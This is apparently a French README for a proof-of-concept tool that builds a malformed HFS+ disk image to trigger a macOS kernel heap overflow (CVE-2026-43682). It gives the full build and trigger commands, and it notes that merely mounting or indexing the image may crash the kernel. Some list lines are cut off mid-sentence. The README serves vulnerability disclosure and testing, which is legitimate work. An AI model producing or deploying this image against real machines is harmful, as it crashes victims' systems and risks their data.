
Générateur d'image disque de preuve de concept qui fabrique une clé d'arbre B d'attributs HFS+ malformée pour déclencher le débordement de tas du noyau CVE-2026-43682 sur macOS.
Cette preuve de concept est censée provoquer un kernel panic et redémarrer un Mac affecté. Utilisez-la uniquement sur un système de test jetable. La capture de preuves a été réalisée sur un Apple silicon exécutant macOS Tahoe 26.3 (25D125). Apple a corrigé CVE-2026-43682 dans Tahoe 26.6, Sequoia 15.7.8 et Sonoma 14.8.8.
Le PoC est un générateur d'image disque, et non un exploit d'élévation de privilèges. Il :
_COMM_PAGE_ASB_TARGET_KERN_VALUE du boot en cours sur Apple silicon ;La copie malformée est déterministe. Que Probabilistic GZAlloc place une garde là où l'écrasement déclenche immédiatement une faute ne l'est pas.
hdiutil et xattr.Aucun paquet Python tiers n'est requis.
L'utilitaire est optionnel, mais il rend explicite la valeur propre à chaque boot avant la génération de l'image :
cd poc
clang -O2 -Wall -Wextra check_commpage.c -o check_commpage
./check_commpage
Créez l'image de base et patchez son arbre d'attributs :
./create_base_dmg.sh base_with_attrs.dmg
python3 craft_attr_poc_asb.py \
base_with_attrs.dmg \
cve-2026-43682.dmg \
2884
Le script Python affiche la valeur du Target Flag du noyau pour le même boot et le motif écrit dans l'image.
Attacher ou indexer ultérieurement l'image peut suffire à atteindre le chemin d'attributs vulnérable. Le déclenchement explicite utilisé lors des tests était :
hdiutil attach -readonly -nobrowse cve-2026-43682.dmg
ls -l@ /Volumes/AttrPOC/
Sur un système vulnérable, le résultat attendu est un data abort du noyau lors de la copie de la clé B-tree surdimensionnée. Sur un système corrigé, la clé malformée devrait être rejetée sans corruption de la mémoire du noyau.
Après une exécution sans plantage, détachez le volume de test avec :
hdiutil detach /Volumes/AttrPOC